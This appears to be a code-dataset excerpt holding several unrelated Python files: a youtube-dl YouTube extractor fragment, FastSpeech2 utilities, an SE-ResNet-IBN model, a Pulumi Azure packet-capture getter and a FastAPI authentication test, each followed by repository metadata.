IE_DESC = 'YouTube.com (multi-season) shows'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/show/(?P<id>[^?#]*)'
IE_NAME = 'youtube:show'
_TESTS = [{
'url': 'https://www.youtube.com/show/airdisasters',
'playlist_mincount': 5,
'info_dict': {
'id': 'airdisasters',
'title': 'Air Disasters',
}
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
return super(YoutubeShowIE, self)._real_extract(
'https://www.youtube.com/show/%s/playlists' % playlist_id)
class YoutubeFeedsInfoExtractor(YoutubeBaseInfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME and _PLAYLIST_TITLE properties.
"""
_LOGIN_REQUIRED = True
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_initialize(self):
self._login()
def _entries(self, page):
# The extraction process is the same as for playlists, but the regex
# for the video ids doesn't contain an index
ids = []
more_widget_html = content_html = page
for page_num in itertools.count(1):
matches = re.findall(r'href="\s*/watch\?v=([0-9A-Za-z_-]{11})', content_html)
# 'recommended' feed has infinite 'load more' and each new portion spins
# the same videos in (sometimes) slightly different order, so we'll check
# for unicity and break when portion has no new videos
new_ids = list(filter(lambda video_id: video_id not in ids, orderedSet(matches)))
if not new_ids:
break
ids.extend(new_ids)
for entry in self._ids_to_results(new_ids):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), self._PLAYLIST_TITLE,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
more_widget_html = more['load_more_widget_html']
def _real_extract(self, url):
page = self._download_webpage(
'https://www.youtube.com/feed/%s' % self._FEED_NAME,
self._PLAYLIST_TITLE)
return self.playlist_result(
self._entries(page), playlist_title=self._PLAYLIST_TITLE)
class YoutubeWatchLaterIE(YoutubePlaylistIE):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list, ":ytwatchlater" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:feed/watch_later|(?:playlist|watch)\?(?:.+&)?list=WL)|:ytwatchlater'
_TESTS = [{
'url': 'https://www.youtube.com/playlist?list=WL',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=bCNU9TrbiRk&index=1&list=WL',
'only_matching': True,
}]
def _real_extract(self, url):
_, video = self._check_download_just_video(url, 'WL')
if video:
return video
_, playlist = self._extract_playlist('WL')
return playlist
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube.com favourite videos, ":ytfav" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/my_favorites|:ytfav(?:ou?rites)?'
_LOGIN_REQUIRED = True
def _real_extract(self, url):
webpage = self._download_webpage('https://www.youtube.com/my_favorites', 'Youtube Favourites videos')
playlist_id = self._search_regex(r'list=(.+?)["&]', webpage, 'favourites playlist id')
return self.url_result(playlist_id, 'YoutubePlaylist')
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com recommended videos, ":ytrec" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/recommended|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_PLAYLIST_TITLE = 'Youtube Recommended videos'
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube.com subscriptions feed, "ytsubs" keyword (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/subscriptions|:ytsubs(?:criptions)?'
_FEED_NAME = 'subscriptions'
_PLAYLIST_TITLE = 'Youtube Subscriptions'
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history, ":ythistory" for short (requires authentication)'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/feed/history|:ythistory'
_FEED_NAME = 'history'
_PLAYLIST_TITLE = 'Youtube History'
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
| 45.418428
| 348
| 0.523723
|
a9d07202caf3a081a27c0d5c2f56c1d4203f143c
| 12,291
|
py
|
Python
|
utils/tools.py
|
ttslr/Expressive-FastSpeech2
|
7f1c463d0f10053596de62e5c112ee952f58d924
|
[
"MIT"
] | 79
|
2021-05-17T10:19:40.000Z
|
2022-03-27T09:01:58.000Z
|
utils/tools.py
|
KunZhou9646/Expressive-FastSpeech2
|
7f1c463d0f10053596de62e5c112ee952f58d924
|
[
"MIT"
] | 13
|
2021-05-16T23:07:29.000Z
|
2022-03-20T23:45:04.000Z
|
utils/tools.py
|
KunZhou9646/Expressive-FastSpeech2
|
7f1c463d0f10053596de62e5c112ee952f58d924
|
[
"MIT"
] | 22
|
2021-05-16T09:35:50.000Z
|
2022-03-04T09:52:58.000Z
|
import os
import json
import torch
import torch.nn.functional as F
import numpy as np
import matplotlib
from scipy.io import wavfile
from matplotlib import pyplot as plt
matplotlib.use("Agg")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def to_device(data, device):
if len(data) == 12:
(
ids,
raw_texts,
speakers,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
) = data
speakers = torch.from_numpy(speakers).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
mels = torch.from_numpy(mels).float().to(device)
mel_lens = torch.from_numpy(mel_lens).to(device)
pitches = torch.from_numpy(pitches).float().to(device)
energies = torch.from_numpy(energies).to(device)
durations = torch.from_numpy(durations).long().to(device)
return (
ids,
raw_texts,
speakers,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
)
if len(data) == 15:
(
ids,
raw_texts,
speakers,
emotions,
arousals,
valences,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
) = data
speakers = torch.from_numpy(speakers).long().to(device)
emotions = torch.from_numpy(emotions).long().to(device)
arousals = torch.from_numpy(arousals).long().to(device)
valences = torch.from_numpy(valences).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
mels = torch.from_numpy(mels).float().to(device)
mel_lens = torch.from_numpy(mel_lens).to(device)
pitches = torch.from_numpy(pitches).float().to(device)
energies = torch.from_numpy(energies).to(device)
durations = torch.from_numpy(durations).long().to(device)
return (
ids,
raw_texts,
speakers,
emotions,
arousals,
valences,
texts,
src_lens,
max_src_len,
mels,
mel_lens,
max_mel_len,
pitches,
energies,
durations,
)
if len(data) == 6:
(ids, raw_texts, speakers, texts, src_lens, max_src_len) = data
speakers = torch.from_numpy(speakers).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
return (ids, raw_texts, speakers, texts, src_lens, max_src_len)
if len(data) == 9:
(ids, raw_texts, speakers, emotions, arousals, valences, texts, src_lens, max_src_len) = data
speakers = torch.from_numpy(speakers).long().to(device)
emotions = torch.from_numpy(emotions).long().to(device)
arousals = torch.from_numpy(arousals).long().to(device)
valences = torch.from_numpy(valences).long().to(device)
texts = torch.from_numpy(texts).long().to(device)
src_lens = torch.from_numpy(src_lens).to(device)
return (ids, raw_texts, speakers, emotions, arousals, valences, texts, src_lens, max_src_len)
def log(
logger, step=None, losses=None, fig=None, audio=None, sampling_rate=22050, tag=""
):
if losses is not None:
logger.add_scalar("Loss/total_loss", losses[0], step)
logger.add_scalar("Loss/mel_loss", losses[1], step)
logger.add_scalar("Loss/mel_postnet_loss", losses[2], step)
logger.add_scalar("Loss/pitch_loss", losses[3], step)
logger.add_scalar("Loss/energy_loss", losses[4], step)
logger.add_scalar("Loss/duration_loss", losses[5], step)
if fig is not None:
logger.add_figure(tag, fig)
if audio is not None:
logger.add_audio(
tag,
audio / max(abs(audio)),
sample_rate=sampling_rate,
)
def get_mask_from_lengths(lengths, max_len=None):
batch_size = lengths.shape[0]
if max_len is None:
max_len = torch.max(lengths).item()
ids = torch.arange(0, max_len).unsqueeze(0).expand(batch_size, -1).to(device)
mask = ids >= lengths.unsqueeze(1).expand(-1, max_len)
return mask
def expand(values, durations):
out = list()
for value, d in zip(values, durations):
out += [value] * max(0, int(d))
return np.array(out)
def synth_one_sample(targets, predictions, vocoder, model_config, preprocess_config):
basename = targets[0][0]
src_len = predictions[8][0].item()
mel_len = predictions[9][0].item()
mel_target = targets[9][0, :mel_len].detach().transpose(0, 1)
mel_prediction = predictions[1][0, :mel_len].detach().transpose(0, 1)
duration = targets[14][0, :src_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["pitch"]["feature"] == "phoneme_level":
pitch = targets[12][0, :src_len].detach().cpu().numpy()
pitch = expand(pitch, duration)
else:
pitch = targets[12][0, :mel_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["energy"]["feature"] == "phoneme_level":
energy = targets[13][0, :src_len].detach().cpu().numpy()
energy = expand(energy, duration)
else:
energy = targets[13][0, :mel_len].detach().cpu().numpy()
with open(
os.path.join(preprocess_config["path"]["preprocessed_path"], "stats.json")
) as f:
stats = json.load(f)
stats = stats["pitch"] + stats["energy"][:2]
fig = plot_mel(
[
(mel_prediction.cpu().numpy(), pitch, energy),
(mel_target.cpu().numpy(), pitch, energy),
],
stats,
["Synthetized Spectrogram", "Ground-Truth Spectrogram"],
)
if vocoder is not None:
from .model import vocoder_infer
wav_reconstruction = vocoder_infer(
mel_target.unsqueeze(0),
vocoder,
model_config,
preprocess_config,
)[0]
wav_prediction = vocoder_infer(
mel_prediction.unsqueeze(0),
vocoder,
model_config,
preprocess_config,
)[0]
else:
wav_reconstruction = wav_prediction = None
return fig, wav_reconstruction, wav_prediction, basename
def synth_samples(targets, predictions, vocoder, model_config, preprocess_config, path, tag=None):
basenames = targets[0]
for i in range(len(predictions[0])):
basename = basenames[i]
src_len = predictions[8][i].item()
mel_len = predictions[9][i].item()
mel_prediction = predictions[1][i, :mel_len].detach().transpose(0, 1)
duration = predictions[5][i, :src_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["pitch"]["feature"] == "phoneme_level":
pitch = predictions[2][i, :src_len].detach().cpu().numpy()
pitch = expand(pitch, duration)
else:
pitch = predictions[2][i, :mel_len].detach().cpu().numpy()
if preprocess_config["preprocessing"]["energy"]["feature"] == "phoneme_level":
energy = predictions[3][i, :src_len].detach().cpu().numpy()
energy = expand(energy, duration)
else:
energy = predictions[3][i, :mel_len].detach().cpu().numpy()
with open(
os.path.join(preprocess_config["path"]["preprocessed_path"], "stats.json")
) as f:
stats = json.load(f)
stats = stats["pitch"] + stats["energy"][:2]
fig = plot_mel(
[
(mel_prediction.cpu().numpy(), pitch, energy),
],
stats,
["Synthetized Spectrogram"],
)
plt.savefig(os.path.join(path, "{}{}.png".format(basename, f"_{tag}" if tag is not None else "")))
plt.close()
from .model import vocoder_infer
mel_predictions = predictions[1].transpose(1, 2)
lengths = predictions[9] * preprocess_config["preprocessing"]["stft"]["hop_length"]
wav_predictions = vocoder_infer(
mel_predictions, vocoder, model_config, preprocess_config, lengths=lengths
)
sampling_rate = preprocess_config["preprocessing"]["audio"]["sampling_rate"]
for wav, basename in zip(wav_predictions, basenames):
wavfile.write(os.path.join(path, "{}{}.wav".format(basename, f"_{tag}" if tag is not None else "")), sampling_rate, wav)
def plot_mel(data, stats, titles):
fig, axes = plt.subplots(len(data), 1, squeeze=False)
if titles is None:
titles = [None for i in range(len(data))]
pitch_min, pitch_max, pitch_mean, pitch_std, energy_min, energy_max = stats
pitch_min = pitch_min * pitch_std + pitch_mean
pitch_max = pitch_max * pitch_std + pitch_mean
def add_axis(fig, old_ax):
ax = fig.add_axes(old_ax.get_position(), anchor="W")
ax.set_facecolor("None")
return ax
for i in range(len(data)):
mel, pitch, energy = data[i]
pitch = pitch * pitch_std + pitch_mean
axes[i][0].imshow(mel, origin="lower")
axes[i][0].set_aspect(2.5, adjustable="box")
axes[i][0].set_ylim(0, mel.shape[0])
axes[i][0].set_title(titles[i], fontsize="medium")
axes[i][0].tick_params(labelsize="x-small", left=False, labelleft=False)
axes[i][0].set_anchor("W")
ax1 = add_axis(fig, axes[i][0])
ax1.plot(pitch, color="tomato")
ax1.set_xlim(0, mel.shape[1])
ax1.set_ylim(0, pitch_max)
ax1.set_ylabel("F0", color="tomato")
ax1.tick_params(
labelsize="x-small", colors="tomato", bottom=False, labelbottom=False
)
ax2 = add_axis(fig, axes[i][0])
ax2.plot(energy, color="darkviolet")
ax2.set_xlim(0, mel.shape[1])
ax2.set_ylim(energy_min, energy_max)
ax2.set_ylabel("Energy", color="darkviolet")
ax2.yaxis.set_label_position("right")
ax2.tick_params(
labelsize="x-small",
colors="darkviolet",
bottom=False,
labelbottom=False,
left=False,
labelleft=False,
right=True,
labelright=True,
)
return fig
def pad_1D(inputs, PAD=0):
def pad_data(x, length, PAD):
x_padded = np.pad(
x, (0, length - x.shape[0]), mode="constant", constant_values=PAD
)
return x_padded
max_len = max((len(x) for x in inputs))
padded = np.stack([pad_data(x, max_len, PAD) for x in inputs])
return padded
def pad_2D(inputs, maxlen=None):
def pad(x, max_len):
PAD = 0
if np.shape(x)[0] > max_len:
raise ValueError("not max_len")
s = np.shape(x)[1]
x_padded = np.pad(
x, (0, max_len - np.shape(x)[0]), mode="constant", constant_values=PAD
)
return x_padded[:, :s]
if maxlen:
output = np.stack([pad(x, maxlen) for x in inputs])
else:
max_len = max(np.shape(x)[0] for x in inputs)
output = np.stack([pad(x, max_len) for x in inputs])
return output
def pad(input_ele, mel_max_length=None):
if mel_max_length:
max_len = mel_max_length
else:
max_len = max([input_ele[i].size(0) for i in range(len(input_ele))])
out_list = list()
for i, batch in enumerate(input_ele):
if len(batch.shape) == 1:
one_batch_padded = F.pad(
batch, (0, max_len - batch.size(0)), "constant", 0.0
)
elif len(batch.shape) == 2:
one_batch_padded = F.pad(
batch, (0, 0, 0, max_len - batch.size(0)), "constant", 0.0
)
out_list.append(one_batch_padded)
out_padded = torch.stack(out_list)
return out_padded
| 32.430079
| 128
| 0.582947
|
6833e78420e6d3ddde6a3665d232a5e31f7615e6
| 6,524
|
py
|
Python
|
modeling/backbones/senet_ibn_a.py
|
ZHUXUHAN/reid-baseline
|
43e8734be52a90d8131af8c4b43536ba6911bdaa
|
[
"MIT"
] | 2
|
2019-11-30T08:11:22.000Z
|
2019-12-11T14:35:01.000Z
|
modeling/backbones/senet_ibn_a.py
|
ZHUXUHAN/reid-baseline
|
43e8734be52a90d8131af8c4b43536ba6911bdaa
|
[
"MIT"
] | 1
|
2020-01-09T03:48:26.000Z
|
2020-03-07T01:22:37.000Z
|
modeling/backbones/senet_ibn_a.py
|
ZHUXUHAN/reid-baseline
|
43e8734be52a90d8131af8c4b43536ba6911bdaa
|
[
"MIT"
] | 1
|
2019-11-30T09:24:17.000Z
|
2019-11-30T09:24:17.000Z
|
from .se_module import SELayer
import torch.nn as nn
import torch
import math
__all__ = ['se_resnet50_ibn_a', 'se_resnet101_ibn_a', 'se_resnet152_ibn_a']
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
class IBN(nn.Module):
def __init__(self, planes):
super(IBN, self).__init__()
half1 = int(planes / 2)
self.half = half1
half2 = planes - half1
self.IN = nn.InstanceNorm2d(half1, affine=True)
self.BN = nn.BatchNorm2d(half2)
def forward(self, x):
split = torch.split(x, self.half, 1)
out1 = self.IN(split[0].contiguous())
out2 = self.BN(split[1].contiguous())
out = torch.cat((out1, out2), 1)
return out
class SEBasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, reduction=16):
super(SEBasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes, 1)
self.bn2 = nn.BatchNorm2d(planes)
self.se = SELayer(planes, reduction)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class SEBottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, ibn=False, reduction=16):
super(SEBottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
if ibn:
self.bn1 = IBN(planes)
else:
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.se = SELayer(planes * 4, reduction)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, last_stride, block, layers, num_classes=1000):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=last_stride)
self.avgpool = nn.AvgPool2d(7)
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.conv1.weight.data.normal_(0, math.sqrt(2. / (7 * 7 * 64)))
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.InstanceNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
ibn = True
if planes == 512:
ibn = False
layers.append(block(self.inplanes, planes, stride, downsample, ibn=ibn))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, ibn=ibn))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
# x = self.avgpool(x)
# x = x.view(x.size(0), -1)
# x = self.fc(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict['state_dict']:
if 'fc' in i[7:]:
continue
self.state_dict()[i[7:]].copy_(param_dict['state_dict'][i])
def se_resnet50_ibn_a(last_stride):
"""Constructs a ResNet-50 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(SEBottleneck, last_stride, [3, 4, 6, 3])
return model
def se_resnet101_ibn_a(last_stride):
"""Constructs a ResNet-101 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(last_stride, SEBottleneck, [3, 4, 23, 3])
return model
def se_resnet152_ibn_a(num_classes):
"""Constructs a ResNet-152 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(SEBottleneck, [3, 8, 36, 3], num_classes=num_classes)
model.avgpool = nn.AdaptiveAvgPool2d(1)
return model
| 31.066667
| 96
| 0.583691
|
fb7849dcd8a3bad4aa8f9e9d9c1b460d92e6ac7a
| 95
|
py
|
Python
|
Python/pierwszy.py
|
amundsenscott4/helloworld
|
f14e77c5a3a3bb2d3d88d730d658589f9a007330
|
[
"MIT"
] | null | null | null |
Python/pierwszy.py
|
amundsenscott4/helloworld
|
f14e77c5a3a3bb2d3d88d730d658589f9a007330
|
[
"MIT"
] | null | null | null |
Python/pierwszy.py
|
amundsenscott4/helloworld
|
f14e77c5a3a3bb2d3d88d730d658589f9a007330
|
[
"MIT"
] | null | null | null |
import random
print("Hello world")
for i in range(10):
print(round(random.random()*100))
| 13.571429
| 37
| 0.684211
|
ccd9b267a6514b826b2accc6a9c70e28110c5d11
| 7,316
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200801/get_packet_capture.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200801/get_packet_capture.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200801/get_packet_capture.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetPacketCaptureResult',
'AwaitableGetPacketCaptureResult',
'get_packet_capture',
]
@pulumi.output_type
class GetPacketCaptureResult:
"""
Information about packet capture session.
"""
def __init__(__self__, bytes_to_capture_per_packet=None, etag=None, filters=None, id=None, name=None, provisioning_state=None, storage_location=None, target=None, time_limit_in_seconds=None, total_bytes_per_session=None):
if bytes_to_capture_per_packet and not isinstance(bytes_to_capture_per_packet, float):
raise TypeError("Expected argument 'bytes_to_capture_per_packet' to be a float")
pulumi.set(__self__, "bytes_to_capture_per_packet", bytes_to_capture_per_packet)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if filters and not isinstance(filters, list):
raise TypeError("Expected argument 'filters' to be a list")
pulumi.set(__self__, "filters", filters)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if storage_location and not isinstance(storage_location, dict):
raise TypeError("Expected argument 'storage_location' to be a dict")
pulumi.set(__self__, "storage_location", storage_location)
if target and not isinstance(target, str):
raise TypeError("Expected argument 'target' to be a str")
pulumi.set(__self__, "target", target)
if time_limit_in_seconds and not isinstance(time_limit_in_seconds, int):
raise TypeError("Expected argument 'time_limit_in_seconds' to be a int")
pulumi.set(__self__, "time_limit_in_seconds", time_limit_in_seconds)
if total_bytes_per_session and not isinstance(total_bytes_per_session, float):
raise TypeError("Expected argument 'total_bytes_per_session' to be a float")
pulumi.set(__self__, "total_bytes_per_session", total_bytes_per_session)
@property
@pulumi.getter(name="bytesToCapturePerPacket")
def bytes_to_capture_per_packet(self) -> Optional[float]:
"""
Number of bytes captured per packet, the remaining bytes are truncated.
"""
return pulumi.get(self, "bytes_to_capture_per_packet")
@property
@pulumi.getter
def etag(self) -> str:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def filters(self) -> Optional[Sequence['outputs.PacketCaptureFilterResponse']]:
"""
A list of packet capture filters.
"""
return pulumi.get(self, "filters")
@property
@pulumi.getter
def id(self) -> str:
"""
ID of the packet capture operation.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the packet capture session.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the packet capture session.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="storageLocation")
def storage_location(self) -> 'outputs.PacketCaptureStorageLocationResponse':
"""
The storage location for a packet capture session.
"""
return pulumi.get(self, "storage_location")
@property
@pulumi.getter
def target(self) -> str:
"""
The ID of the targeted resource, only VM is currently supported.
"""
return pulumi.get(self, "target")
@property
@pulumi.getter(name="timeLimitInSeconds")
def time_limit_in_seconds(self) -> Optional[int]:
"""
Maximum duration of the capture session in seconds.
"""
return pulumi.get(self, "time_limit_in_seconds")
@property
@pulumi.getter(name="totalBytesPerSession")
def total_bytes_per_session(self) -> Optional[float]:
"""
Maximum size of the capture output.
"""
return pulumi.get(self, "total_bytes_per_session")
class AwaitableGetPacketCaptureResult(GetPacketCaptureResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPacketCaptureResult(
bytes_to_capture_per_packet=self.bytes_to_capture_per_packet,
etag=self.etag,
filters=self.filters,
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
storage_location=self.storage_location,
target=self.target,
time_limit_in_seconds=self.time_limit_in_seconds,
total_bytes_per_session=self.total_bytes_per_session)
def get_packet_capture(network_watcher_name: Optional[str] = None,
packet_capture_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPacketCaptureResult:
"""
Information about packet capture session.
:param str network_watcher_name: The name of the network watcher.
:param str packet_capture_name: The name of the packet capture session.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['networkWatcherName'] = network_watcher_name
__args__['packetCaptureName'] = packet_capture_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20200801:getPacketCapture', __args__, opts=opts, typ=GetPacketCaptureResult).value
return AwaitableGetPacketCaptureResult(
bytes_to_capture_per_packet=__ret__.bytes_to_capture_per_packet,
etag=__ret__.etag,
filters=__ret__.filters,
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
storage_location=__ret__.storage_location,
target=__ret__.target,
time_limit_in_seconds=__ret__.time_limit_in_seconds,
total_bytes_per_session=__ret__.total_bytes_per_session)
| 39.122995
| 225
| 0.675642
|
77b61ab9a3daebbd13f33095349945a7af868ca2
| 6,792
|
py
|
Python
|
app/tests/api/test_auth.py
|
hollyfoxx/ace2-ams-api
|
08ecf3f3dc8ac9abd224465731458950d4f78b7d
|
[
"Apache-2.0"
] | null | null | null |
app/tests/api/test_auth.py
|
hollyfoxx/ace2-ams-api
|
08ecf3f3dc8ac9abd224465731458950d4f78b7d
|
[
"Apache-2.0"
] | null | null | null |
app/tests/api/test_auth.py
|
hollyfoxx/ace2-ams-api
|
08ecf3f3dc8ac9abd224465731458950d4f78b7d
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import time
from datetime import datetime, timedelta
from fastapi import status, testclient
from jose import jwt
from core.config import get_settings, Settings
from tests.helpers import create_test_user
from main import app
#
# INVALID TESTS
#
@pytest.mark.parametrize(
"username,password",
[
("johndoe", "wrongpassword"),
("wronguser", "abcd1234"),
],
)
def test_auth_invalid(client, db, username, password):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": username, "password": password})
assert auth.status_code == status.HTTP_401_UNAUTHORIZED
assert auth.json()["detail"] == "Invalid username or password"
# Attempt to use a bogus token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": "Bearer asdf"})
assert get.status_code == status.HTTP_401_UNAUTHORIZED
